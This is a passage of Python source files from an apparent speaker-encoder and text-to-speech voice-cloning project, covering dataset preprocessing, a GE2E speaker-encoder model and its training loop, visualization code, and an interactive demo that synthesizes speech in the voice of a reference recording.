Useful if the preprocessing was " "interrupted.") parser.add_argument("--hparams", type=str, default="", help=\ "Hyperparameter overrides as a comma-separated list of name-value pairs") parser.add_argument("--no_alignments", action="store_true", help=\ "Use this option when dataset does not include alignments\ (these are used to split long audio files into sub-utterances.)") parser.add_argument("--datasets_name", type=str, default="LibriSpeech", help=\ "Name of the dataset directory to process.") parser.add_argument("--subfolders", type=str, default="train-clean-100,train-clean-360", help=\ "Comma-separated list of subfolders to process inside your dataset directory") args = parser.parse_args() # Process the arguments if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root.joinpath("SV2TTS", "synthesizer") # Create directories assert args.datasets_root.exists() args.out_dir.mkdir(exist_ok=True, parents=True) # Preprocess the dataset print_args(args, parser) args.hparams = hparams.parse(args.hparams) preprocess_dataset(**vars(args)) File: vocoder_preprocess.py import argparse import os from pathlib import Path from synthesizer.hparams import hparams from synthesizer.synthesize import run_synthesis from utils.argutils import print_args if __name__ == "__main__": class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): pass parser = argparse.ArgumentParser( description="Creates ground-truth aligned (GTA) spectrograms from the vocoder.", formatter_class=MyFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your SV2TTS directory. If you specify both --in_dir and " "--out_dir, this argument won't be used.") parser.add_argument("-s", "--syn_model_fpath", type=Path, default="saved_models/default/synthesizer.pt", help="Path to a saved synthesizer") parser.add_argument("-i", "--in_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the synthesizer directory that contains the mel spectrograms, the wavs and the " "embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the output vocoder directory that will contain the ground truth aligned mel " "spectrograms. 
Defaults to <datasets_root>/SV2TTS/vocoder/.") parser.add_argument("--hparams", default="", help=\ "Hyperparameter overrides as a comma-separated list of name=value pairs") parser.add_argument("--cpu", action="store_true", help=\ "If True, processing is done on CPU, even when a GPU is available.") args = parser.parse_args() print_args(args, parser) modified_hp = hparams.parse(args.hparams) if not hasattr(args, "in_dir"): args.in_dir = args.datasets_root / "SV2TTS" / "synthesizer" if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root / "SV2TTS" / "vocoder" if args.cpu: # Hide GPUs from Pytorch to force CPU processing os.environ["CUDA_VISIBLE_DEVICES"] = "-1" run_synthesis(args.in_dir, args.out_dir, args.syn_model_fpath, modified_hp) File: demo_cli.py import argparse import os from pathlib import Path import librosa import numpy as np import soundfile as sf import torch from encoder import inference as encoder from encoder.params_model import model_embedding_size as speaker_embedding_size from synthesizer.inference import Synthesizer from utils.argutils import print_args from utils.default_models import ensure_default_models from vocoder import inference as vocoder if __name__ == '__main__': parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("-e", "--enc_model_fpath", type=Path, default="saved_models/default/encoder.pt", help="Path to a saved encoder") parser.add_argument("-s", "--syn_model_fpath", type=Path, default="saved_models/default/synthesizer.pt", help="Path to a saved synthesizer") parser.add_argument("-v", "--voc_model_fpath", type=Path, default="saved_models/default/vocoder.pt", help="Path to a saved vocoder") parser.add_argument("--cpu", action="store_true", help=\ "If True, processing is done on CPU, even when a GPU is available.") parser.add_argument("--no_sound", action="store_true", help=\ "If True, audio won't be played.") parser.add_argument("--seed", type=int, default=None, help=\ "Optional random number seed value to make toolbox deterministic.") args = parser.parse_args() arg_dict = vars(args) print_args(args, parser) # Hide GPUs from Pytorch to force CPU processing if arg_dict.pop("cpu"): os.environ["CUDA_VISIBLE_DEVICES"] = "-1" print("Running a test of your configuration...\n") if torch.cuda.is_available(): device_id = torch.cuda.current_device() gpu_properties = torch.cuda.get_device_properties(device_id) ## Print some environment information (for debugging purposes) print("Found %d GPUs available. Using GPU %d (%s) of compute capability %d.%d with " "%.1fGb total memory.\n" % (torch.cuda.device_count(), device_id, gpu_properties.name, gpu_properties.major, gpu_properties.minor, gpu_properties.total_memory / 1e9)) else: print("Using CPU for inference.\n") ## Load the models one by one. print("Preparing the encoder, the synthesizer and the vocoder...") ensure_default_models(Path("saved_models")) encoder.load_model(args.enc_model_fpath) synthesizer = Synthesizer(args.syn_model_fpath) vocoder.load_model(args.voc_model_fpath) ## Run a test print("Testing your configuration with small inputs.") # Forward an audio waveform of zeroes that lasts 1 second. Notice how we can get the encoder's # sampling rate, which may differ. # If you're unfamiliar with digital audio, know that it is encoded as an array of floats # (or sometimes integers, but mostly floats in this projects) ranging from -1 to 1. 
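# For instance, one second of a 440 Hz tone at 16 kHz is nothing more than 16000 floats kept
# within [-1, 1] (an illustrative sketch only; the test below simply uses an array of zeroes):
#   t = np.arange(16000) / 16000
#   tone = 0.5 * np.sin(2 * np.pi * 440 * t)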
# The sampling rate is the number of values (samples) recorded per second, it is set to # 16000 for the encoder. Creating an array of length <sampling_rate> will always correspond # to an audio of 1 second. print("\tTesting the encoder...") encoder.embed_utterance(np.zeros(encoder.sampling_rate)) # Create a dummy embedding. You would normally use the embedding that encoder.embed_utterance # returns, but here we're going to make one ourselves just for the sake of showing that it's # possible. embed = np.random.rand(speaker_embedding_size) # Embeddings are L2-normalized (this isn't important here, but if you want to make your own # embeddings it will be). embed /= np.linalg.norm(embed) # The synthesizer can handle multiple inputs with batching. Let's create another embedding to # illustrate that embeds = [embed, np.zeros(speaker_embedding_size)] texts = ["test 1", "test 2"] print("\tTesting the synthesizer... (loading the model will output a lot of text)") mels = synthesizer.synthesize_spectrograms(texts, embeds) # The vocoder synthesizes one waveform at a time, but it's more efficient for long ones. We # can concatenate the mel spectrograms to a single one. mel = np.concatenate(mels, axis=1) # The vocoder can take a callback function to display the generation. More on that later. For # now we'll simply hide it like this: no_action = lambda *args: None print("\tTesting the vocoder...") # For the sake of making this test short, we'll pass a short target length. The target length # is the length of the wav segments that are processed in parallel. E.g. for audio sampled # at 16000 Hertz, a target length of 8000 means that the target audio will be cut in chunks of # 0.5 seconds which will all be generated together. The parameters here are absurdly short, and # that has a detrimental effect on the quality of the audio. The default parameters are # recommended in general. vocoder.infer_waveform(mel, target=200, overlap=50, progress_callback=no_action) print("All test passed! You can now synthesize speech.\n\n") ## Interactive speech generation print("This is a GUI-less example of interface to SV2TTS. The purpose of this script is to " "show how you can interface this project easily with your own. See the source code for " "an explanation of what is happening.\n") print("Interactive generation loop") num_generated = 0 while True: try: # Get the reference audio filepath message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \ "wav, m4a, flac, ...):\n" in_fpath = Path(input(message).replace("\"", "").replace("\'", "")) ## Computing the embedding # First, we load the wav using the function that the speaker encoder provides. This is # important: there is preprocessing that must be applied. # The following two methods are equivalent: # - Directly load from the filepath: preprocessed_wav = encoder.preprocess_wav(in_fpath) # - If the wav is already loaded: original_wav, sampling_rate = librosa.load(str(in_fpath)) preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate) print("Loaded file succesfully") # Then we derive the embedding. There are many functions and parameters that the # speaker encoder interfaces. These are mostly for in-depth research. 
You will typically # only use this function (with its default parameters): embed = encoder.embed_utterance(preprocessed_wav) print("Created the embedding") ## Generating the spectrogram text = input("Write a sentence (+-20 words) to be synthesized:\n") # If seed is specified, reset torch seed and force synthesizer reload if args.seed is not None: torch.manual_seed(args.seed) synthesizer = Synthesizer(args.syn_model_fpath) # The synthesizer works in batch, so you need to put your data in a list or numpy array texts = [text] embeds = [embed] # If you know what the attention layer alignments are, you can retrieve them here by # passing return_alignments=True specs = synthesizer.synthesize_spectrograms(texts, embeds) spec = specs[0] print("Created the mel spectrogram") ## Generating the waveform print("Synthesizing the waveform:") # If seed is specified, reset torch seed and reload vocoder if args.seed is not None: torch.manual_seed(args.seed) vocoder.load_model(args.voc_model_fpath) # Synthesizing the waveform is fairly straightforward. Remember that the longer the # spectrogram, the more time-efficient the vocoder. generated_wav = vocoder.infer_waveform(spec) ## Post-generation # There's a bug with sounddevice that makes the audio cut one second earlier, so we # pad it. generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode="constant") # Trim excess silences to compensate for gaps in spectrograms (issue #53) generated_wav = encoder.preprocess_wav(generated_wav) # Play the audio (non-blocking) if not args.no_sound: import sounddevice as sd try: sd.stop() sd.play(generated_wav, synthesizer.sample_rate) except sd.PortAudioError as e: print("\nCaught exception: %s" % repr(e)) print("Continuing without audio playback. Suppress this message with the \"--no_sound\" flag.\n") except: raise # Save it on the disk filename = "demo_output_%02d.wav" % num_generated print(generated_wav.dtype) sf.write(filename, generated_wav.astype(np.float32), synthesizer.sample_rate) num_generated += 1 print("\nSaved output as %s\n\n" % filename) except Exception as e: print("Caught exception: %s" % repr(e)) print("Restarting\n") File: encoder/params_data.py ## Mel-filterbank mel_window_length = 25 # In milliseconds mel_window_step = 10 # In milliseconds mel_n_channels = 40 ## Audio sampling_rate = 16000 # Number of spectrogram frames in a partial utterance partials_n_frames = 160 # 1600 ms # Number of spectrogram frames at inference inference_n_frames = 80 # 800 ms ## Voice Activation Detection # Window size of the VAD. Must be either 10, 20 or 30 milliseconds. # This sets the granularity of the VAD. Should not need to be changed. vad_window_length = 30 # In milliseconds # Number of frames to average together when performing the moving average smoothing. # The larger this value, the larger the VAD variations must be to not get smoothed out. vad_moving_average_width = 8 # Maximum number of consecutive silent frames a segment can have. 
vad_max_silence_length = 6 ## Audio volume normalization audio_norm_target_dBFS = -30 File: encoder/params_model.py ## Model parameters model_hidden_size = 256 model_embedding_size = 256 model_num_layers = 3 ## Training parameters learning_rate_init = 1e-4 speakers_per_batch = 64 utterances_per_speaker = 10 File: encoder/config.py librispeech_datasets = { "train": { "clean": ["LibriSpeech/train-clean-100", "LibriSpeech/train-clean-360"], "other": ["LibriSpeech/train-other-500"] }, "test": { "clean": ["LibriSpeech/test-clean"], "other": ["LibriSpeech/test-other"] }, "dev": { "clean": ["LibriSpeech/dev-clean"], "other": ["LibriSpeech/dev-other"] }, } libritts_datasets = { "train": { "clean": ["LibriTTS/train-clean-100", "LibriTTS/train-clean-360"], "other": ["LibriTTS/train-other-500"] }, "test": { "clean": ["LibriTTS/test-clean"], "other": ["LibriTTS/test-other"] }, "dev": { "clean": ["LibriTTS/dev-clean"], "other": ["LibriTTS/dev-other"] }, } voxceleb_datasets = { "voxceleb1" : { "train": ["VoxCeleb1/wav"], "test": ["VoxCeleb1/test_wav"] }, "voxceleb2" : { "train": ["VoxCeleb2/dev/aac"], "test": ["VoxCeleb2/test_wav"] } } other_datasets = [ "LJSpeech-1.1", "VCTK-Corpus/wav48", ] anglophone_nationalites = ["australia", "canada", "ireland", "uk", "usa"] File: encoder/preprocess.py from datetime import datetime from functools import partial from multiprocessing import Pool from pathlib import Path import numpy as np from tqdm import tqdm from encoder import audio from encoder.config import librispeech_datasets, anglophone_nationalites from encoder.params_data import * _AUDIO_EXTENSIONS = ("wav", "flac", "m4a", "mp3") class DatasetLog: """ Registers metadata about the dataset in a text file. """ def __init__(self, root, name): self.text_file = open(Path(root, "Log_%s.txt" % name.replace("/", "_")), "w") self.sample_data = dict() start_time = str(datetime.now().strftime("%A %d %B %Y at %H:%M")) self.write_line("Creating dataset %s on %s" % (name, start_time)) self.write_line("-----") self._log_params() def _log_params(self): from encoder import params_data self.write_line("Parameter values:") for param_name in (p for p in dir(params_data) if not p.startswith("__")): value = getattr(params_data, param_name) self.write_line("\t%s: %s" % (param_name, value)) self.write_line("-----") def write_line(self, line): self.text_file.write("%s\n" % line) def add_sample(self, **kwargs): for param_name, value in kwargs.items(): if not param_name in self.sample_data: self.sample_data[param_name] = [] self.sample_data[param_name].append(value) def finalize(self): self.write_line("Statistics:") for param_name, values in self.sample_data.items(): self.write_line("\t%s:" % param_name) self.write_line("\t\tmin %.3f, max %.3f" % (np.min(values), np.max(values))) self.write_line("\t\tmean %.3f, median %.3f" % (np.mean(values), np.median(values))) self.write_line("-----") end_time = str(datetime.now().strftime("%A %d %B %Y at %H:%M")) self.write_line("Finished on %s" % end_time) self.text_file.close() def _init_preprocess_dataset(dataset_name, datasets_root, out_dir) -> (Path, DatasetLog): dataset_root = datasets_root.joinpath(dataset_name) if not dataset_root.exists(): print("Couldn\'t find %s, skipping this dataset." 
% dataset_root) return None, None return dataset_root, DatasetLog(out_dir, dataset_name) def _preprocess_speaker(speaker_dir: Path, datasets_root: Path, out_dir: Path, skip_existing: bool): # Give a name to the speaker that includes its dataset speaker_name = "_".join(speaker_dir.relative_to(datasets_root).parts) # Create an output directory with that name, as well as a txt file containing a # reference to each source file. speaker_out_dir = out_dir.joinpath(speaker_name) speaker_out_dir.mkdir(exist_ok=True) sources_fpath = speaker_out_dir.joinpath("_sources.txt") # There's a possibility that the preprocessing was interrupted earlier, check if # there already is a sources file. if sources_fpath.exists(): try: with sources_fpath.open("r") as sources_file: existing_fnames = {line.split(",")[0] for line in sources_file} except: existing_fnames = {} else: existing_fnames = {} # Gather all audio files for that speaker recursively sources_file = sources_fpath.open("a" if skip_existing else "w") audio_durs = [] for extension in _AUDIO_EXTENSIONS: for in_fpath in speaker_dir.glob("**/*.%s" % extension): # Check if the target output file already exists out_fname = "_".join(in_fpath.relative_to(speaker_dir).parts) out_fname = out_fname.replace(".%s" % extension, ".npy") if skip_existing and out_fname in existing_fnames: continue # Load and preprocess the waveform wav = audio.preprocess_wav(in_fpath) if len(wav) == 0: continue # Create the mel spectrogram, discard those that are too short frames = audio.wav_to_mel_spectrogram(wav) if len(frames) < partials_n_frames: continue out_fpath = speaker_out_dir.joinpath(out_fname) np.save(out_fpath, frames) sources_file.write("%s,%s\n" % (out_fname, in_fpath)) audio_durs.append(len(wav) / sampling_rate) sources_file.close() return audio_durs def _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger): print("%s: Preprocessing data for %d speakers." 
% (dataset_name, len(speaker_dirs))) # Process the utterances for each speaker work_fn = partial(_preprocess_speaker, datasets_root=datasets_root, out_dir=out_dir, skip_existing=skip_existing) with Pool(4) as pool: tasks = pool.imap(work_fn, speaker_dirs) for sample_durs in tqdm(tasks, dataset_name, len(speaker_dirs), unit="speakers"): for sample_dur in sample_durs: logger.add_sample(duration=sample_dur) logger.finalize() print("Done preprocessing %s.\n" % dataset_name) def preprocess_librispeech(datasets_root: Path, out_dir: Path, skip_existing=False): for dataset_name in librispeech_datasets["train"]["other"]: # Initialize the preprocessing dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Preprocess all speakers speaker_dirs = list(dataset_root.glob("*")) _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) def preprocess_voxceleb1(datasets_root: Path, out_dir: Path, skip_existing=False): # Initialize the preprocessing dataset_name = "VoxCeleb1" dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Get the contents of the meta file with dataset_root.joinpath("vox1_meta.csv").open("r") as metafile: metadata = [line.split("\t") for line in metafile][1:] # Select the ID and the nationality, filter out non-anglophone speakers nationalities = {line[0]: line[3] for line in metadata} keep_speaker_ids = [speaker_id for speaker_id, nationality in nationalities.items() if nationality.lower() in anglophone_nationalites] print("VoxCeleb1: using samples from %d (presumed anglophone) speakers out of %d." % (len(keep_speaker_ids), len(nationalities))) # Get the speaker directories for anglophone speakers only speaker_dirs = dataset_root.joinpath("wav").glob("*") speaker_dirs = [speaker_dir for speaker_dir in speaker_dirs if speaker_dir.name in keep_speaker_ids] print("VoxCeleb1: found %d anglophone speakers on the disk, %d missing (this is normal)." 
% (len(speaker_dirs), len(keep_speaker_ids) - len(speaker_dirs))) # Preprocess all speakers _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) def preprocess_voxceleb2(datasets_root: Path, out_dir: Path, skip_existing=False): # Initialize the preprocessing dataset_name = "VoxCeleb2" dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Get the speaker directories # Preprocess all speakers speaker_dirs = list(dataset_root.joinpath("dev", "aac").glob("*")) _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) File: encoder/__init__.py File: encoder/model.py from encoder.params_model import * from encoder.params_data import * from scipy.interpolate import interp1d from sklearn.metrics import roc_curve from torch.nn.utils import clip_grad_norm_ from scipy.optimize import brentq from torch import nn import numpy as np import torch class SpeakerEncoder(nn.Module): def __init__(self, device, loss_device): super().__init__() self.loss_device = loss_device # Network defition self.lstm = nn.LSTM(input_size=mel_n_channels, hidden_size=model_hidden_size, num_layers=model_num_layers, batch_first=True).to(device) self.linear = nn.Linear(in_features=model_hidden_size, out_features=model_embedding_size).to(device) self.relu = torch.nn.ReLU().to(device) # Cosine similarity scaling (with fixed initial parameter values) self.similarity_weight = nn.Parameter(torch.tensor([10.])).to(loss_device) self.similarity_bias = nn.Parameter(torch.tensor([-5.])).to(loss_device) # Loss self.loss_fn = nn.CrossEntropyLoss().to(loss_device) def do_gradient_ops(self): # Gradient scale self.similarity_weight.grad *= 0.01 self.similarity_bias.grad *= 0.01 # Gradient clipping clip_grad_norm_(self.parameters(), 3, norm_type=2) def forward(self, utterances, hidden_init=None): """ Computes the embeddings of a batch of utterance spectrograms. :param utterances: batch of mel-scale filterbanks of same duration as a tensor of shape (batch_size, n_frames, n_channels) :param hidden_init: initial hidden state of the LSTM as a tensor of shape (num_layers, batch_size, hidden_size). Will default to a tensor of zeros if None. :return: the embeddings as a tensor of shape (batch_size, embedding_size) """ # Pass the input through the LSTM layers and retrieve all outputs, the final hidden state # and the final cell state. out, (hidden, cell) = self.lstm(utterances, hidden_init) # We take only the hidden state of the last layer embeds_raw = self.relu(self.linear(hidden[-1])) # L2-normalize it embeds = embeds_raw / (torch.norm(embeds_raw, dim=1, keepdim=True) + 1e-5) return embeds def similarity_matrix(self, embeds): """ Computes the similarity matrix according the section 2.1 of GE2E. :param embeds: the embeddings as a tensor of shape (speakers_per_batch, utterances_per_speaker, embedding_size) :return: the similarity matrix as a tensor of shape (speakers_per_batch, utterances_per_speaker, speakers_per_batch) """ speakers_per_batch, utterances_per_speaker = embeds.shape[:2] # Inclusive centroids (1 per speaker). 
Cloning is needed for reverse differentiation centroids_incl = torch.mean(embeds, dim=1, keepdim=True) centroids_incl = centroids_incl.clone() / (torch.norm(centroids_incl, dim=2, keepdim=True) + 1e-5) # Exclusive centroids (1 per utterance) centroids_excl = (torch.sum(embeds, dim=1, keepdim=True) - embeds) centroids_excl /= (utterances_per_speaker - 1) centroids_excl = centroids_excl.clone() / (torch.norm(centroids_excl, dim=2, keepdim=True) + 1e-5) # Similarity matrix. The cosine similarity of already 2-normed vectors is simply the dot # product of these vectors (which is just an element-wise multiplication reduced by a sum). # We vectorize the computation for efficiency. sim_matrix = torch.zeros(speakers_per_batch, utterances_per_speaker, speakers_per_batch).to(self.loss_device) mask_matrix = 1 - np.eye(speakers_per_batch, dtype=np.int) for j in range(speakers_per_batch): mask = np.where(mask_matrix[j])[0] sim_matrix[mask, :, j] = (embeds[mask] * centroids_incl[j]).sum(dim=2) sim_matrix[j, :, j] = (embeds[j] * centroids_excl[j]).sum(dim=1) ## Even more vectorized version (slower maybe because of transpose) # sim_matrix2 = torch.zeros(speakers_per_batch, speakers_per_batch, utterances_per_speaker # ).to(self.loss_device) # eye = np.eye(speakers_per_batch, dtype=np.int) # mask = np.where(1 - eye) # sim_matrix2[mask] = (embeds[mask[0]] * centroids_incl[mask[1]]).sum(dim=2) # mask = np.where(eye) # sim_matrix2[mask] = (embeds * centroids_excl).sum(dim=2) # sim_matrix2 = sim_matrix2.transpose(1, 2) sim_matrix = sim_matrix * self.similarity_weight + self.similarity_bias return sim_matrix def loss(self, embeds): """ Computes the softmax loss according the section 2.1 of GE2E. :param embeds: the embeddings as a tensor of shape (speakers_per_batch, utterances_per_speaker, embedding_size) :return: the loss and the EER for this batch of embeddings. """ speakers_per_batch, utterances_per_speaker = embeds.shape[:2] # Loss sim_matrix = self.similarity_matrix(embeds) sim_matrix = sim_matrix.reshape((speakers_per_batch * utterances_per_speaker, speakers_per_batch)) ground_truth = np.repeat(np.arange(speakers_per_batch), utterances_per_speaker) target = torch.from_numpy(ground_truth).long().to(self.loss_device) loss = self.loss_fn(sim_matrix, target) # EER (not backpropagated) with torch.no_grad(): inv_argmax = lambda i: np.eye(1, speakers_per_batch, i, dtype=np.int)[0] labels = np.array([inv_argmax(i) for i in ground_truth]) preds = sim_matrix.detach().cpu().numpy() # Snippet from https://yangcha.github.io/EER-ROC/ fpr, tpr, thresholds = roc_curve(labels.flatten(), preds.flatten()) eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.) return loss, eer File: encoder/visualizations.py from datetime import datetime from time import perf_counter as timer import numpy as np import umap import visdom from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset colormap = np.array([ [76, 255, 0], [0, 127, 70], [255, 0, 0], [255, 217, 38], [0, 135, 255], [165, 0, 165], [255, 167, 255], [0, 255, 255], [255, 96, 38], [142, 76, 0], [33, 0, 127], [0, 0, 0], [183, 183, 183], ], dtype=np.float) / 255 class Visualizations: def __init__(self, env_name=None, update_every=10, server="http://localhost", disabled=False): # Tracking data self.last_update_timestamp = timer() self.update_every = update_every self.step_times = [] self.losses = [] self.eers = [] print("Updating the visualizations every %d steps." 
% update_every) # If visdom is disabled TODO: use a better paradigm for that self.disabled = disabled if self.disabled: return # Set the environment name now = str(datetime.now().strftime("%d-%m %Hh%M")) if env_name is None: self.env_name = now else: self.env_name = "%s (%s)" % (env_name, now) # Connect to visdom and open the corresponding window in the browser try: self.vis = visdom.Visdom(server, env=self.env_name, raise_exceptions=True) except ConnectionError: raise Exception("No visdom server detected. Run the command \"visdom\" in your CLI to " "start it.") # webbrowser.open("http://localhost:8097/env/" + self.env_name) # Create the windows self.loss_win = None self.eer_win = None # self.lr_win = None self.implementation_win = None self.projection_win = None self.implementation_string = "" def log_params(self): if self.disabled: return from encoder import params_data from encoder import params_model param_string = "<b>Model parameters</b>:<br>" for param_name in (p for p in dir(params_model) if not p.startswith("__")): value = getattr(params_model, param_name) param_string += "\t%s: %s<br>" % (param_name, value) param_string += "<b>Data parameters</b>:<br>" for param_name in (p for p in dir(params_data) if not p.startswith("__")): value = getattr(params_data, param_name) param_string += "\t%s: %s<br>" % (param_name, value) self.vis.text(param_string, opts={"title": "Parameters"}) def log_dataset(self, dataset: SpeakerVerificationDataset): if self.disabled: return dataset_string = "" dataset_string += "<b>Speakers</b>: %s\n" % len(dataset.speakers) dataset_string += "\n" + dataset.get_logs() dataset_string = dataset_string.replace("\n", "<br>") self.vis.text(dataset_string, opts={"title": "Dataset"}) def log_implementation(self, params): if self.disabled: return implementation_string = "" for param, value in params.items(): implementation_string += "<b>%s</b>: %s\n" % (param, value) implementation_string = implementation_string.replace("\n", "<br>") self.implementation_string = implementation_string self.implementation_win = self.vis.text( implementation_string, opts={"title": "Training implementation"} ) def update(self, loss, eer, step): # Update the tracking data now = timer() self.step_times.append(1000 * (now - self.last_update_timestamp)) self.last_update_timestamp = now self.losses.append(loss) self.eers.append(eer) print(".", end="") # Update the plots every <update_every> steps if step % self.update_every != 0: return time_string = "Step time: mean: %5dms std: %5dms" % \ (int(np.mean(self.step_times)), int(np.std(self.step_times))) print("\nStep %6d Loss: %.4f EER: %.4f %s" % (step, np.mean(self.losses), np.mean(self.eers), time_string)) if not self.disabled: self.loss_win = self.vis.line( [np.mean(self.losses)], [step], win=self.loss_win, update="append" if self.loss_win else None, opts=dict( legend=["Avg. loss"], xlabel="Step", ylabel="Loss", title="Loss", ) ) self.eer_win = self.vis.line( [np.mean(self.eers)], [step], win=self.eer_win, update="append" if self.eer_win else None, opts=dict( legend=["Avg. 
EER"], xlabel="Step", ylabel="EER", title="Equal error rate" ) ) if self.implementation_win is not None: self.vis.text( self.implementation_string + ("<b>%s</b>" % time_string), win=self.implementation_win, opts={"title": "Training implementation"}, ) # Reset the tracking self.losses.clear() self.eers.clear() self.step_times.clear() def draw_projections(self, embeds, utterances_per_speaker, step, out_fpath=None, max_speakers=10): import matplotlib.pyplot as plt max_speakers = min(max_speakers, len(colormap)) embeds = embeds[:max_speakers * utterances_per_speaker] n_speakers = len(embeds) // utterances_per_speaker ground_truth = np.repeat(np.arange(n_speakers), utterances_per_speaker) colors = [colormap[i] for i in ground_truth] reducer = umap.UMAP() projected = reducer.fit_transform(embeds) plt.scatter(projected[:, 0], projected[:, 1], c=colors) plt.gca().set_aspect("equal", "datalim") plt.title("UMAP projection (step %d)" % step) if not self.disabled: self.projection_win = self.vis.matplot(plt, win=self.projection_win) if out_fpath is not None: plt.savefig(out_fpath) plt.clf() def save(self): if not self.disabled: self.vis.save([self.env_name]) File: encoder/train.py from pathlib import Path import torch from encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset from encoder.model import SpeakerEncoder from encoder.params_model import * from encoder.visualizations import Visualizations from utils.profiler import Profiler def sync(device: torch.device): # For correct profiling (cuda operations are async) if device.type == "cuda": torch.cuda.synchronize(device) def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, no_visdom: bool): # Create a dataset and a dataloader dataset = SpeakerVerificationDataset(clean_data_root) loader = SpeakerVerificationDataLoader( dataset, speakers_per_batch, utterances_per_speaker, num_workers=4, ) # Setup the device on which to run the forward pass and the loss. These can be different, # because the forward pass is faster on the GPU whereas the loss is often (depending on your # hyperparameters) faster on the CPU. device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # FIXME: currently, the gradient is None if loss_device is cuda loss_device = torch.device("cpu") # Create the model and the optimizer model = SpeakerEncoder(device, loss_device) optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) init_step = 1 # Configure file path for the model model_dir = models_dir / run_id model_dir.mkdir(exist_ok=True, parents=True) state_fpath = model_dir / "encoder.pt" # Load any existing model if not force_restart: if state_fpath.exists(): print("Found existing model \"%s\", loading it and resuming training." % run_id) checkpoint = torch.load(state_fpath) init_step = checkpoint["step"] model.load_state_dict(checkpoint["model_state"]) optimizer.load_state_dict(checkpoint["optimizer_state"]) optimizer.param_groups[0]["lr"] = learning_rate_init else: print("No model \"%s\" found, starting training from scratch." 
% run_id) else: print("Starting the training from scratch.") model.train() # Initialize the visualization environment vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) vis.log_dataset(dataset) vis.log_params() device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") vis.log_implementation({"Device": device_name}) # Training loop profiler = Profiler(summarize_every=10, disabled=False) for step, speaker_batch in enumerate(loader, init_step): profiler.tick("Blocking, waiting for batch (threaded)") # Forward pass inputs = torch.from_numpy(speaker_batch.data).to(device) sync(device) profiler.tick("Data to %s" % device) embeds = model(inputs) sync(device) profiler.tick("Forward pass") embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) loss, eer = model.loss(embeds_loss) sync(loss_device) profiler.tick("Loss") # Backward pass model.zero_grad() loss.backward() profiler.tick("Backward pass") model.do_gradient_ops() optimizer.step() profiler.tick("Parameter update") # Update visualizations # learning_rate = optimizer.param_groups[0]["lr"] vis.update(loss.item(), eer, step) # Draw projections and save them to the backup folder if umap_every != 0 and step % umap_every == 0: print("Drawing and saving projections (step %d)" % step) projection_fpath = model_dir / f"umap_{step:06d}.png" embeds = embeds.detach().cpu().numpy() vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) vis.save() # Overwrite the latest version of the model if save_every != 0 and step % save_every == 0: print("Saving the model (step %d)" % step) torch.save({ "step": step + 1, "model_state": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, state_fpath) # Make a backup if backup_every != 0 and step % backup_every == 0: print("Making a backup (step %d)" % step) backup_fpath = model_dir / f"encoder_{step:06d}.bak" torch.save({ "step": step + 1, "model_state": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, backup_fpath) profiler.tick("Extras (visualizations, saving)") File: encoder/inference.py from encoder.params_data import * from encoder.model import SpeakerEncoder from encoder.audio import preprocess_wav # We want to expose this function from here from matplotlib import cm from encoder import audio from pathlib import Path import numpy as np import torch _model = None # type: SpeakerEncoder _device = None # type: torch.device def load_model(weights_fpath: Path, device=None): """ Loads the model in memory. If this function is not explicitely called, it will be run on the first call to embed_frames() with the default weights file. :param weights_fpath: the path to saved model weights. :param device: either a torch device or the name of a torch device (e.g. "cpu", "cuda"). The model will be loaded and will run on this device. Outputs will however always be on the cpu. If None, will default to your GPU if it"s available, otherwise your CPU. """ # TODO: I think the slow loading of the encoder might have something to do with the device it # was saved on. Worth investigating. 
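    # Typical call pattern (a sketch; "speaker.wav" is a placeholder path, not a file in this repo):
    #   load_model(Path("saved_models/default/encoder.pt"))
    #   wav = preprocess_wav("speaker.wav")
    #   embedding = embed_utterance(wav)   # numpy array of shape (model_embedding_size,)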
